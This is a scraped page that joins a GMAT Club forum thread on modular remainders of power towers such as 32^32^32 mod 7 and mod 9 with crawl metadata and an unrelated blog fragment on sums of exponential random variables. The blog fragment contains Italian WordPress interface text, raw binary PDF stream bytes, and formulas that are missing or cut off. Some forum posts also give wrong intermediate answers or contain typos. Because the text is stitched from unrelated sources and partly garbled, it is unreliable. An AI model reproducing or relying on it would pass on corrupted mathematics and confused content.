What is the remainder when 32^32^32 is divided by 7? : GMAT Problem Solving (PS) - Page 2 Check GMAT Club Decision Tracker for the Latest School Decision Releases http://gmatclub.com/AppTrack It is currently 21 Jan 2017, 03:35 ### GMAT Club Daily Prep #### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email. Customized for You we will pick new questions that match your level based on your Timer History Track every week, we’ll send you an estimated GMAT score based on your performance Practice Pays we will pick new questions that match your level based on your Timer History # Events & Promotions ###### Events & Promotions in June Open Detailed Calendar # What is the remainder when 32^32^32 is divided by 7? Author Message TAGS: ### Hide Tags CEO Status: Nothing comes easy: neither do I want. Joined: 12 Oct 2009 Posts: 2795 Location: Malaysia Concentration: Technology, Entrepreneurship Schools: ISB '15 (M) GMAT 1: 670 Q49 V31 GMAT 2: 710 Q50 V35 Followers: 226 Kudos [?]: 1620 [0], given: 235 ### Show Tags 03 Sep 2010, 07:43 anshumishra : Its good if you know Euler theorem. The theorem is Fermat's little theorem that uses Euler theorem. Guys you do not have to learn all these theorems for Gmat, if you know then its good if not then also you can solve this question using basics of remainders.Do not panic. When 32^32 is divided by 6 the remainder is 4 not 2. Please check your solution. 32^32 when divided by 6 gives remainder same as when 2^32 is divided by 6 => 2^32 mod 6 = $$(2^{5*{6}} )* (2^2)$$ mod 6 = 32^6 * 4 mod 6 = 2^6 *4 mod 6 = 2^5 * 2^3 mod 6 = 2*2 = 4 _________________ Fight for your dreams :For all those who fear from Verbal- lets give it a fight Money Saved is the Money Earned Jo Bole So Nihaal , Sat Shri Akaal GMAT Club Premium Membership - big benefits and savings Gmat test review : http://gmatclub.com/forum/670-to-710-a-long-journey-without-destination-still-happy-141642.html Manager Joined: 25 Jun 2010 Posts: 91 Followers: 1 Kudos [?]: 34 [0], given: 0 ### Show Tags 03 Sep 2010, 09:19 Thanks Gurpreet, I have edited my post where i missed to multiply by 4 instead of 2. I have made "4" as bold 4. Thanks Manager Joined: 25 Jun 2010 Posts: 91 Followers: 1 Kudos [?]: 34 [0], given: 0 ### Show Tags 03 Sep 2010, 13:07 1 This post was BOOKMARKED mainhoon wrote: How do you get 32x32= 6x +k? anshumishra wrote: 32^32^32 % 7 = ? I am using Euler's method, search on wikipedia if you need proof, else try to follow the steps : HCF(32,7) = 1 "phi" 7 = 6 (it is the number of positive integers less than 7 and prime to 7.. In fact for any prime number "n", it will be "n-1"). => 32^6 mod 7 = 1 (mod is same as "%") (To make sure you understand it, please try for any number n!=7, n^6 mod 7 = 1) So, we now need to express, 32^32 = 6x+k i.e. 32^32 % 6 = ? To make it easier, lets try to find out 16^32 % 3 and multiply the remainder by 4 (since 32 and 6 has a common factor 2, and also it is easier/helpful to get a remainder divided by a prime number) Apply the same approach as shown above : HCF(16,3) = 1 "phi" 3 = 2 => 16^2 mod 3 = 1 => 16^32 mod 3 = 1 => 32^32 mod 6 = 4*1 = 4 So, 32^32 mod 6 = 6y+4 Therefore; 32^32^32 mod 7 = 32^(6y+4) mod 7 = 32^4 mod 7 = (28+4)^4 mod 7 = 4^4 mod 7 = 4 (Hopefully, I didn't make any typo.... Let me know if there is any problem with understanding this) Thanks Posted from my mobile device You mean : How do you get 32^32= 6x +k? Since, 32^6 mod 7 = 1 Hence 32^6x mod 7 = 1, that is why I am trying to express 32^32 in terms of 32^(6x+K), that way you have to just be concerned about calculating32^K mod 7 How it has been calculated is shown above. CEO Status: Nothing comes easy: neither do I want. Joined: 12 Oct 2009 Posts: 2795 Location: Malaysia Concentration: Technology, Entrepreneurship Schools: ISB '15 (M) GMAT 1: 670 Q49 V31 GMAT 2: 710 Q50 V35 Followers: 226 Kudos [?]: 1620 [0], given: 235 ### Show Tags 04 Sep 2010, 10:35 Similar question to test what you have learnt from the previous post. What is the remainder when $$32^{32^{32}}$$ is divided by 9? A. 7 B. 4 C. 2 D. 0 E. 1 _________________ Fight for your dreams :For all those who fear from Verbal- lets give it a fight Money Saved is the Money Earned Jo Bole So Nihaal , Sat Shri Akaal GMAT Club Premium Membership - big benefits and savings Gmat test review : http://gmatclub.com/forum/670-to-710-a-long-journey-without-destination-still-happy-141642.html Manager Joined: 25 Jun 2010 Posts: 91 Followers: 1 Kudos [?]: 34 [0], given: 0 ### Show Tags 04 Sep 2010, 11:31 32^32^32 % 9 = ? 32^32^32 = 2^2^161 Here the remainder repeats the pattern of 6: 2,4,8,7,5,1 So, 2^2^161 % 9 = 2^5 % 9 = 5 CEO Status: Nothing comes easy: neither do I want. Joined: 12 Oct 2009 Posts: 2795 Location: Malaysia Concentration: Technology, Entrepreneurship Schools: ISB '15 (M) GMAT 1: 670 Q49 V31 GMAT 2: 710 Q50 V35 Followers: 226 Kudos [?]: 1620 [0], given: 235 ### Show Tags 04 Sep 2010, 13:05 1 This post was BOOKMARKED anshumishra wrote: 32^32^32 % 9 = ? 32^32^32 = 2^2^161 Here the remainder repeats the pattern of 6: 2,4,8,7,5,1 So, 2^2^161 % 9 = 2^5 % 9 = 5 How you got the step in red? Do not copy the Bunnel's explanation, this time it has to be divided by 9 not 7. _________________ Fight for your dreams :For all those who fear from Verbal- lets give it a fight Money Saved is the Money Earned Jo Bole So Nihaal , Sat Shri Akaal GMAT Club Premium Membership - big benefits and savings Gmat test review : http://gmatclub.com/forum/670-to-710-a-long-journey-without-destination-still-happy-141642.html CEO Status: Nothing comes easy: neither do I want. Joined: 12 Oct 2009 Posts: 2795 Location: Malaysia Concentration: Technology, Entrepreneurship Schools: ISB '15 (M) GMAT 1: 670 Q49 V31 GMAT 2: 710 Q50 V35 Followers: 226 Kudos [?]: 1620 [0], given: 235 ### Show Tags 04 Sep 2010, 13:12 Guys bear with me , I m posting the question created by me. What is the remainder when $$11^{11^{11^{11}}.....10 times}$$ is divided by 4. a. 1 b. 0 c. 3 d. 2 e. None This is a very easy question. This concept will help in many other questions. THINK LOGICALLY AND REVISE BASICS OF REMAINDERs. _________________ Fight for your dreams :For all those who fear from Verbal- lets give it a fight Money Saved is the Money Earned Jo Bole So Nihaal , Sat Shri Akaal GMAT Club Premium Membership - big benefits and savings Gmat test review : http://gmatclub.com/forum/670-to-710-a-long-journey-without-destination-still-happy-141642.html Manager Joined: 25 Jun 2010 Posts: 91 Followers: 1 Kudos [?]: 34 [0], given: 0 ### Show Tags 04 Sep 2010, 14:03 gurpreetsingh wrote: Guys bear with me , I m posting the question created by me. What is the remainder when $$11^{11^{11^{11}}.....10 times}$$ is divided by 4. a. 1 b. 0 c. 3 d. 2 e. None This is a very easy question. This concept will help in many other questions. THINK LOGICALLY AND REVISE BASICS OF REMAINDERs. 11^z %4 = (12-1)^z %4 = (-1)^z % 4 = 3 if z is odd, else 1 when z is even Manager Joined: 25 Jun 2010 Posts: 91 Followers: 1 Kudos [?]: 34 [0], given: 0 ### Show Tags 04 Sep 2010, 14:07 gurpreetsingh wrote: anshumishra wrote: 32^32^32 % 9 = ? 32^32^32 = 2^2^161 Here the remainder repeats the pattern of 6: 2,4,8,7,5,1 So, 2^2^161 % 9 = 2^5 % 9 = 5 How you got the step in red? Do not copy the Bunnel's explanation, this time it has to be divided by 9 not 7. Yeah, thought to copy the partial solution of Bunnel to save sometime, however made mistake because of rushing through it : 32^32^32 %9 = (27+5)^32^32 % 9 = 5^32^32 % 9 = 5 ^ 2^160 % 9 The cyclicity here is 6 , so it could be solved the same ways. I am not going to try it again this time CEO Status: Nothing comes easy: neither do I want. Joined: 12 Oct 2009 Posts: 2795 Location: Malaysia Concentration: Technology, Entrepreneurship Schools: ISB '15 (M) GMAT 1: 670 Q49 V31 GMAT 2: 710 Q50 V35 Followers: 226 Kudos [?]: 1620 [0], given: 235 ### Show Tags 04 Sep 2010, 14:39 anshumishra wrote: gurpreetsingh wrote: anshumishra wrote: 32^32^32 % 9 = ? 32^32^32 = 2^2^161 Here the remainder repeats the pattern of 6: 2,4,8,7,5,1 So, 2^2^161 % 9 = 2^5 % 9 = 5 How you got the step in red? Do not copy the Bunnel's explanation, this time it has to be divided by 9 not 7. Yeah, thought to copy the partial solution of Bunnel to save sometime, however made mistake because of rushing through it : 32^32^32 %9 = (27+5)^32^32 % 9 = 5^32^32 % 9 = 5 ^ 2^160 % 9 The cyclicity here is 6 , so it could be solved the same ways. I am not going to try it again this time The most important thing is to learn the concept. _________________ Fight for your dreams :For all those who fear from Verbal- lets give it a fight Money Saved is the Money Earned Jo Bole So Nihaal , Sat Shri Akaal GMAT Club Premium Membership - big benefits and savings Gmat test review : http://gmatclub.com/forum/670-to-710-a-long-journey-without-destination-still-happy-141642.html Intern Joined: 10 Oct 2010 Posts: 23 Location: Texas Followers: 3 Kudos [?]: 18 [0], given: 1 ### Show Tags 10 Oct 2010, 02:09 Hi, I'm new here. First, I wanted to say thank you to everyone for all of the awesome questions and explanations throughout the forum. Second, here are my explanations for the three questions that have been posted. R{x/y} represents remainder of x divided by y. R{(ab)/y} = R{ (R{a/y}*R{b/y}) / y} <---- I found this on one of the forum posts. Therefore, R{(a^c)/y} = R{(R{a/y}^c) / y} <---- I used a nested version of this on all three problems. Problem 1) R{32^(32^32)/7} = R{(R{(R{32/7}^32) / 7}^32) / 7} <-------- R{32/7} = 4 = R{(R{( 4 ^32) / 7}^32) / 7} <-------- R{(4^32)/7} = 2, (R cycles 4,2,1,4,2,1...) = R{( 2 ^32) / 7} <-------- R{(2^32)/7} = 4, (R cycles, 2,4,1,2,4,1...) = 4 Problem 2) R{32^(32^32)/9} = R{(R{(R{32/9}^32) / 9}^32) / 9} <-------- R{32/9} = 5 = R{(R{( 5 ^32) / 9}^32) / 9} <-------- R{(5^32)/9} = 7, (R cycles 5,7,8,4,2,1,5...) = R{( 7 ^32) / 9} <-------- R{(7^32)/9} = 4, (R cycles, 7,4,1,7,4,1...) = 4 Problem 3) R{11^(11^(11^(11^(11...etc))))/4} = R{(R{(R{11/4}^11) / 4}^11....etc.) / 4} <-------- R{11/4} = 3 = R{(R{( 3 ^11) / 3}^11....etc.) / 4} <-------- R{(3^11)/4} = 3, (R cycles 3,1,3,1...) = R{( 3 ^11....etc.) / 4} <-------- R{(3^11)/4} = 3, (R cycles, 3,1,3,1...) = 3 Retired Moderator Status: 2000 posts! I don't know whether I should feel great or sad about it! LOL Joined: 04 Oct 2009 Posts: 1712 Location: Peru Schools: Harvard, Stanford, Wharton, MIT & HKS (Government) WE 1: Economic research WE 2: Banking WE 3: Government: Foreign Trade and SMEs Followers: 97 Kudos [?]: 914 [0], given: 109 ### Show Tags 17 Oct 2010, 15:25 Bunuel wrote: So we should find $$2^{161}$$ (the power of 2) is 1st, 2nd or 3rd number in the above pattern of 3. $$2^{161}$$ is 2 in odd power, 2 in odd power gives remainder of 2 when divided by cyclicity number 3, so it's the second number in pattern. Which means that remainder of $$2^{2^{161}}$$ divided by 7 would be the same as $$2^2$$ divided by 7. $$2^2$$ divided by 7 yields remainder of 4. Hi Bunuel, I don't understand the part of the explanation highlighted in red. Before that part, you analyzed $$2^{161}$$ and concluded that its remainder is 4 (second number in pattern). I am Ok with that. However, I don't understand when you conclude that the remainder will be also 4 when you analyze $$2^{2^{161}}$$. I don't follow you. Thanks! _________________ "Life’s battle doesn’t always go to stronger or faster men; but sooner or later the man who wins is the one who thinks he can." My Integrated Reasoning Logbook / Diary: http://gmatclub.com/forum/my-ir-logbook-diary-133264.html GMAT Club Premium Membership - big benefits and savings Manager Joined: 25 Jul 2010 Posts: 175 WE 1: 4 years Software Product Development WE 2: 3 years ERP Consulting Followers: 7 Kudos [?]: 50 [0], given: 15 ### Show Tags 17 Oct 2010, 18:12 Was trying to use remainder theorem but just gave up :D _________________ Director Joined: 23 Apr 2010 Posts: 584 Followers: 2 Kudos [?]: 78 [0], given: 7 Find the remainder when 32^32^32 is divided by 7? [#permalink] ### Show Tags 28 Sep 2011, 00:47 Find the remainder when 32^32^32 is divided by 7? I know this question has been raised several times on this forum, but I can't find the post. Thanks. Intern Joined: 05 Jul 2011 Posts: 25 Followers: 0 Kudos [?]: 0 [0], given: 2 Re: Find the remainder when 32^32^32 is divided by 7? [#permalink] ### Show Tags 28 Sep 2011, 21:33 Do you mean 32^{32^{32}} ? If yes, the answer is here tough-remainder-question-100316-20.html Director Joined: 23 Apr 2010 Posts: 584 Followers: 2 Kudos [?]: 78 [0], given: 7 Re: Find the remainder when 32^32^32 is divided by 7? [#permalink] ### Show Tags 29 Sep 2011, 01:14 nrgmat, thanks a lot. That's what I've been looking for. Manager Joined: 18 Jun 2010 Posts: 148 Followers: 0 Kudos [?]: 34 [0], given: 2 ### Show Tags 19 Oct 2011, 20:35 Bunuel wrote: gurpreetsingh wrote: What is the remainder when $$32^{32^{32}}$$ is divided by 7? A. 5 B. 4 C. 2 D. 0 E. 1 I will post the Answer and the explanation after some replies. If we use the above approach I'd work with prime as a base. $$32^{{32}^{32}}=(28+4)^{{32}^{32}}$$ now if we expand this, all terms but the last one will have 28 as a multiple and thus will be divisible by 7. The last term will be $$4^{{32}^{32}}=4^{{(2^5)}^{32}}=4^{2^{160}}=2^{2^{161}}$$. So we should find the remainder when $$2^{2^{161}}$$ is divided by 7. 2^1 divided by 7 yields remainder of 2; 2^2 divided by 7 yields remainder of 4; 2^3 divided by 7 yields remainder of 1; 2^4 divided by 7 yields remainder of 2; 2^5 divided by 7 yields remainder of 4; 2^6 divided by 7 yields remainder of 1; ... The remainder repeats the pattern of 3: 2-4-1. So we should find $$2^{161}$$ (the power of 2) is 1st, 2nd or 3rd number in the above pattern of 3. $$2^{161}$$ is 2 in odd power, 2 in odd power gives remainder of 2 when divided by cyclicity number 3, so it's the second number in pattern. Which means that remainder of $$2^{2^{161}}$$ divided by 7 would be the same as $$2^2$$ divided by 7. $$2^2$$ divided by 7 yields remainder of 4. Similar problem: remainder-99724.html?hilit=expand%20this,%20all%20terms#p768816 Hope it's clear. A new concept learnt. Thanks Intern Joined: 01 Oct 2011 Posts: 24 GMAT 1: 730 Q49 V41 WE: Information Technology (Computer Software) Followers: 1 Kudos [?]: 15 [0], given: 21 ### Show Tags 19 Oct 2011, 22:25 trueblue wrote: gurpreetsingh wrote: What is the remainder when $$32^{32^{32}}$$ is divided by 7? A. 5 B. 4 C. 2 D. 0 E. 1 I will post the Answer and the explanation after some replies. Intuitively, i did it like this. 32^32^32 = (28+4)^32^32 As 28 is divisible by 7, we dont need to worry about that part. Hence for the purpose of remainder, our equation boils down to 4^32^32 The cyclicity of 4 is 3 when divided by 7, hence we need to think about the value of 32^32 and what remainder it leaves when divided by 3. Considering 32^32, it can be broken into (30+2)^32. Again 30^32 is divisible by 3. Hence we need to focus on 2^32. 2^32 can be written as (2*2)^31 = (3+1)^31. As 3^31 is also divisible by 3, we will be left with 1^31. Thus 1 would be the remainder when 32^32 is divided by 3. This implies that 4 will be the remainder when divided by 7. Do let me know if i am wrong in my thinking. Thanks. Very good explanation... thanks _________________ - Success is not final, failure is not fatal: it is the courage to continue that counts http://gmatclub.com/forum/finally-gmat-is-over-730-49q-41v-130632.html Manager Joined: 07 Dec 2011 Posts: 174 Location: India Followers: 1 Kudos [?]: 41 [0], given: 24 ### Show Tags 23 Mar 2012, 04:35 find cycle of remainders which are 2,4,1 total power of 2 = 32x32x5 = 5120 divide taht by 3 and get remainder of 2 so the second value in the cycle ie (4) is the answer. B. Intern Joined: 12 Mar 2012 Posts: 16 Followers: 0 Kudos [?]: 7 [0], given: 19 Re: What is the remainder when 32^32^32 is divided by 7? [#permalink] ### Show Tags 19 Apr 2012, 09:51 gurpreetsingh wrote: What is the remainder when $$32^{32^{32}}$$ is divided by 7? A. 5 B. 4 C. 2 D. 0 E. 1 Check the solution here : tough-remainder-question-100316.html#p774893 Guys, found one more method to solve the problem 32^32^32 =(28+4)^32^32 28^32^32 is divisible by seven and we are only concerned about 4^32^32= 4^2^160= 2^2^161 Now 2^161= 2^10^6 X 2^1 = 1024^6X2^1 last digit of 1024^6 will be last didgit of 4^6 i.e 2^12 i.e 2^10X 2^2 i.e 1024X4 hence last digit of 1024^6 will be( 4X4 =16 ) 6 last digit of 1024^6X2=> 6X2=12 => 2 thus equation boils down to 2^2= 4 divided by 7 , reminder will be 4 the ans. Re: What is the remainder when 32^32^32 is divided by 7?   [#permalink] 19 Apr 2012, 09:51 Go to page   Previous    1   2   3   4    Next  [ 72 posts ] Similar topics Replies Last post Similar Topics: 2 What is the remainder when 7^442 is divided by 10? 5 22 Sep 2016, 16:29 If n divided by 7 has a remainder of 2, what is the remainder when 3 5 21 Mar 2016, 06:28 29 What is the remainder when 333^222 is divided by 7? 19 21 Jul 2013, 01:16 1 What is the remainder when 7^381 is divided by 5 ? 5 06 Oct 2009, 00:30 15 What is the remainder when 7^74 - 5^74 is divided by 24? 13 03 Jul 2008, 12:19 Display posts from previous: Sort by
2017-01-21 11:35:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.45471808314323425, "perplexity": 4760.774543515653}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00542-ip-10-171-10-70.ec2.internal.warc.gz"}
https://www.theuprightgroup.com/nenx88o3/aacdaa-sum-of-exponential-distribution
# sum of exponential distribution Posted on Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso: Stai commentando usando il tuo account WordPress.com. Desperately searching for a cure. The law of is given by: Proof. I concluded this proof last night. I know that they will then not be completely independent anymore. The answer is a sum of independent exponentially distributed random variables, which is an Erlang (n, λ) distribution. Let be independent random variables with an exponential distribution with pairwise distinct parameters , respectively. PROPOSITION 3 (m = 2). 3 0 obj Our problem is: what is the expression of the distribution of the random variable ? Let’s define the random variables and . Therefore, scale parameter, λ = 1 / μ = 1 / 5 = 0.20. Now, calculate the probability function at different values of x to derive the distribution curve. In fact, the process can be extended to the case of a sum of a nite number n of random variables of distribution exp( ), and we can observe that the pdf of the sum, Z n, is given by Erlang (n; ), i.e, f Z n (z) = nz 1e z (n 1)! distribution or the exponentiated exponential distribution is deflned as a particular case of the Gompertz-Verhulst distribution function (1), when ‰= 1. Sum of Exponential Random Variables has Gamma Distribution - Induction Proof - YouTube Correction: At the induction step "f_{gamma_n}(t-s)" should equal "f_{X_n}(t-s)" i.e. But before starting, we need to mention two preliminary results that I won’t demonstrate since you can find these proofs in any book of statistics. For x = 0. So, we have: PROPOSITION 5 (m = 4). <> This has been the quality of my life for most of the last two decades. But this is the integral calculated in Prop. I faced the problem for m = 2, 3, 4. So we have: The sum within brackets can be written as follows: So far, we have found the following relationship: In order for the thesis to be true, we just need to prove that. The law of is given by: Proof. In order to carry out our final demonstration, we need to prove a property that is linked to the matrix named after Vandermonde, that the reader who has followed me till this point will likely remember from his studies of linear algebra. <>/XObject<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> Then, the sum is a Gamma random variable with parameters and . For those who might be wondering how the exponential distribution of a random variable with a parameter looks like, I remind that it is given by: negative exponential distribution) is the probability distribution that describes the time between events in a Poisson process, i.e. So we have: For the four integrals we can easily calculate what follows: Adding these four integrals together we obtain: We are now quite confident in saying that the expression of for the generic value of m is given by: for y>0, while being zero otherwise. ( Chiudi sessione /  I can now come back to my awkward studies, which span from statistics to computational immunology, from analysis of genetic data to mathematical modelling of bacterial growth. For the last four months, I have experienced the worst level of my illness: I have been completely unable to think for most of the time. The distribution of  is given by: where f_X is the distribution of the random vector []. Template:Distinguish2 Template:Probability distribution In probability theory and statistics, the exponential distribution (a.k.a. The reader will now recognize that we know the expression of   because of Prop. If we define and , then we can say – thanks to Prop. The difference between Erlang and Gamma is that in a Gamma distribution, n can be a non-integer. The two parameter exponential distribution is also a very useful component in reliability engineering. For example, the amount of time (beginning now) until an earthquake occurs has an exponential distribution. 3(x) is the distribution function of the random variable Z= X+ Y. When I use . Let’s derive the PDF of Exponential from scratch! ( Chiudi sessione /  2 It is easy to see that the convolution operation is commutative, and it is straight-forward to show that it is also associative. a process in which events occur continuously and independently at a constant average rate.. and X i and n = independent variables. x��[Ys�6~���x��l� x&�TyvƓ��Lh���H�BRv�_�� �"$�V6K"q��_7��Ӧ+���}���i����b�>�����Nn_���M�XVyW�շ߲w��ػ۷oN��s?����7��gR�~��$����훀=��߾��o�z]�R/��,�~�s�՛�^3;�^�����8�X��!���ny%�jaL�_�Y�ݷ4$���_��ï�] S�f$My�l�����s�91�G���xH�g�X��~|��R=���q��K���ia �X�ӎ��Y��5G~���Y#'k�FQ�G;�;�f~��A��{����@q? endobj The law of is given by: Proof. Consider I want x random numbers that sum up to one and that distribution is exponential. Exponential Random Variable Sum. As the name suggests, the basic exponential-logarithmic distribution arises from the exponential distribution and the logarithmic distribution via a certain type of randomization. Modifica ), Stai commentando usando il tuo account Google. PROPOSITION 7. We just have to substitute in Prop. The determinant of the Vandermonde matrix is given by: PROPOSITION 6 (lemma). 1. Let be independent exponential random variables with distinct parameters , respectively. Define. A typical application of exponential distributions is to model waiting times or lifetimes. The two random variables and (with n The two random variables and (with n?l�4�9(9 R�����9&�h?ք���,S�����>�9>�Q&��,�Cif�W�2��h���V�g�t�ۆ�A#���#-�6�NШ����'�iI��W3�AE��#n�5Tp_$���8������g��ON�Nl"�)Npn#3?�,��x �g�������Y����J?����C� The Erlang distribution is a special case of the Gamma distribution. ( Chiudi sessione / Modifica ), Mandami una notifica per nuovi articoli via e-mail, Sum of independent exponential random variables, Myalgic Encephalomyelitis/Chronic Fatigue Syndrome, Postural orthostatic tachycardia syndrome (POTS), Sum of independent exponential random variables with the same parameter, Sum of independent exponential random variables with the same parameter – paolo maccallini. Other examples include the length, in minutes, of long distance business telephone calls, and the amount of time, in months, a car battery lasts. The definition of exponential distribution is the probability distribution of the time *between* the events in a Poisson process.. The geometric distribution is a discrete analog of the exponential distribution and is the only discrete distribution with a constant hazard function. 12, and the proof is concluded ♦ A numerical application . : (15.7) The above example describes the process of computing the pdf of a sum of continuous random variables. For example, each of the following gives an application of an exponential distribution. In words, the distribution of additional lifetime is exactly the same as the original distribution of lifetime, so … 7 %���� The Gamma random variable of the exponential distribution with rate parameter λ can be expressed as: $Z=\sum_{i=1}^{n}X_{i}$ Here, Z = gamma random variable. Sum of exponential random variables over their indices. So does anybody know a way so that the probabilities are still exponential distributed? Let be independent exponential random variables with pairwise distinct parameters , respectively. Therefore, X is a two- 4 0 obj ( Chiudi sessione / Prop. Then $$W = \min(W_1, \ldots, W_n)$$ is the winning time of the race, and $$W$$ has an Exponential distribution with rate parameter equal to sum of the individual contestant rate parameters. Exponential Distribution \Memoryless" Property However, we have P(X t) = 1 F(t; ) = e t Therefore, we have P(X t) = P(X t + t 0 jX t 0) for any positive t and t 0. where the second equality used independence, and the next one used that S, being the sum of n independent exponential random variables with rate λ, has a gamma distribution with parameters n, λ. The half life of a radioactive isotope is defined as the time by which half of the atoms of the isotope will have decayed. identically distributed exponential random variables with mean 1/λ. 2 – that and are independent. That is, the half life is the median of the exponential … (1) The mean of the sum of ‘n’ independent Exponential distribution is the sum of individual means. by Marco Taboga, PhD. The reader might have recognized that the density of Y in Prop. If we let Y i = X i / t , i = 1 , … , n − 1 then, as the Jacobian of … Let’s consider the two random variables , . The following relationship is true: Proof. 2 tells us that are independent. 3. <>>> The distribution of the sum of independent random variables is the convolution of their distributions. Searching for a common denominator allows us to rewrite the sum above as follows: References. In the end, we will use the expression of the determinant of the Vandermonde matrix, mentioned above: But this determinant has to be zero since the matrix has two identical lines, which proves the thesis ♦. 3. This means that – according to Prop. �2ǯʐ����*=ݵP�"�,��ύ�爵��ܦ�k�^P��c�:����sdC>A�\�W��Ӓ�F��Cx�2"����p��x�f��]�G�"C�grG.�K�N�� 8�P��q�����a�I�"i7Y���HTX$�N�"��NZ��0yI��E���9�T�������;B;�� Ag[\�|�nd2vZX�TM�**��%>� �@1��$� ��#@���+|Yu�SU> ����(���D ��tv�� ��kk��oS�@��]A��J@��A����SEY�a�2)��U�F ����p�վLc�G�/Ĝ�2����-[UX܃$?��Q�Ai�x(�t�eݔ��c̎V(�G s$����n��{�N�-�N�&�f|"����M"�� �C �C?I�����U0v�m���S!#�T��f�S-@�����d. Memorylessness Property of Exponential Distribution PROPOSITION 1. !R�D�֯�+=$�|�M[�C�"{�����(Df?LYS�}��/����;qD�wu�ի�-Fv$��S�ľ���,���x���"dį1$~�� rryv���qa��&~��,N!��z��+v����9e����O��\$��;�D|���뫙������������BW�]|�ɴ·d��w���9~�'��NX���g�W��R״Чۋk\� 1. The distribution-specific functions can accept parameters of multiple exponential distributions. Then stream This means that – according to Prop. 1 – we have: Now, is the thesis for m-1 while is the exponential distribution with parameter . This lecture discusses how to derive the distribution of the sum of two independent random variables.We explain first how to derive the distribution function of the sum and then how to derive its probability mass function (if the summands are discrete) or its probability density function (if the summands are continuous). Let  be independent random variables. 2. read about it, together with further references, in “Notes on the sum and maximum of independent exponentially distributed random variables with different scale parameters” by Markus Bibinger under exponential distribution, mean and variance of exponential distribution, exponential distribution calculator, exponential distribution examples, memoryless property of exponential … 1 – we have. � ����������H��^oR�| �~�� ���#�p�82e1�θ���CM�u� $$X=$$ lifetime of a radioactive particle $$X=$$ how long you have to wait for an accident to occur at a given intersection These two random variables are independent (Prop. We already know that the thesis is true for m = 2, 3, 4. Suppose $${\displaystyle Z}$$ is the sum of $${\displaystyle n}$$ independent random variables $${\displaystyle X_{1},\dots ,X_{n}}$$ each with probability mass functions $${\displaystyle f_{X_{i}}(x)}$$. For those who might be wondering how the exponential distribution of a random variable with a parameter looks like, I remind that it is given by: As mentioned, I solved the problem for m = 2, 3, 4 in order to understand what the general formula for might have looked like. Below, suppose random variable X is exponentially distributed with rate parameter λ, and $${\displaystyle x_{1},\dotsc ,x_{n}}$$ are n independent samples from X, with sample mean $${\displaystyle {\bar {x}}}$$. endobj Suppose that $$\bs T = (T_1, T_2, \ldots)$$ is a sequence of independent random variables, each with the standard exponential distribution. Then, when I was quite sure of the expression of the general formula of (the distribution of Y) I made my attempt to prove it inductively. That is, if , then, (8) (2) The rth moment of Z can be expressed as; (9) Cumulant generating function By definition, the cumulant generating function for a random variable Z is obtained from, By expansion using Maclaurin series, (10) PROPOSITION 2. 1 – we can write: The reader has likely already realized that we have the expressions of and , thanks to Prop. the mean of the distribution) X is a non-negative continuous random variable with the cdf ... X is the sum of n independent random variables with the distribution Exp(λ) joint conditional pdf of given sum of exponential distribution. Our first question was: Why is λ * e^(−λt) the PDF of the time until the next event occurs? x<-c(10,100,1000) a<-rexp(x[3],rate=1) a<-a/sum(a) This will change the distribution, right? But we aim at a rigorous proof of this expression. In the following lines, we calculate the determinant of the matrix below, with respect to the second line. Modifica ), Stai commentando usando il tuo account Facebook. S n = Xn i=1 T i. • Distribution of S n: f Sn (t) = λe −λt (λt) n−1 (n−1)!, gamma distribution with parameters n and λ. This study considers the nature of order statistics. This is only a poor thing but since it is not present in my books of statistics, I have decided to write it down in my blog, for those who might be interested. Considera una donazione per sostenere questo blog. A paper on this same topic has been written by Markus Bibinger and it is available here. • Define S n as the waiting time for the nth event, i.e., the arrival time of the nth event. Student’s t-distributions are normal distribution with a fatter tail, although is approaches normal distribution as the parameter increases. Generalized Pareto Distribution — The generalized Pareto distribution is a three-parameter continuous distribution that has parameters k (shape), σ (scale), and θ … Let be independent random variables. Then, some days ago, the miracle happened again and I found myself thinking about a theorem I was working on in July. The exponential distribution is often used to model lifetimes of objects like radioactive atoms that undergo exponential decay. So I could do nothing but hanging in there, waiting for a miracle, passing from one medication to the other, well aware that this state could have lasted for years, with no reasonable hope of receiving help from anyone. 2) so – according to Prop. Suppose , , ..., are mutually independent random variables having exponential distribution with parameter . where f_X is the distribution of the random vector [].. endobj We obtain: PROPOSITION 4 (m = 3). The discrete random variable $$I$$ is the label of which contestant is the winner. Hot Network Questions What is the mechanism that triggers a stock price change? The exponential distribution is often concerned with the amount of time until some specific event occurs. An interesting property of the exponential distribution is that it can be viewed as a continuous analogue of the geometric distribution. 2 0 obj ) distribution and, thanks to Prop inserisci i tuoi dati sum of exponential distribution sotto o clicca su un'icona effettuare! Function can be a non-integer discrete random variable with parameters and this is the probability function at different of. Specific event occurs a way so that the thesis is true for m = 2, 3,.. Which is an interesting, and key, relationship between the Poisson and exponential distribution is the exponential and! Now, calculate the probability distribution that describes the process of computing the pdf of a isotope! ( n, Î » = 1 / μ = 1 / =...: where f_X is the sum of exponential distributions is to model waiting times or lifetimes in events! With n < m ) are independent happened again and i found myself about. Been written by Markus Bibinger and it is available here, the distribution... Probability distribution in probability theory and statistics, the amount of time until some specific event occurs: probability that... Erlang and Gamma is that in a Gamma distribution, n can be a.. A process in which events occur continuously and independently at a constant average rate.. joint conditional of! S consider the two random variables with distinct parameters, respectively and it is available here:,. Time of the random variable \ ( I\ ) is the exponential distribution ( a.k.a ). With pairwise distinct parameters, respectively reliability engineering atoms of the random vector [ ] a tail. Variables is the distribution of the Gamma distribution parameter, Î 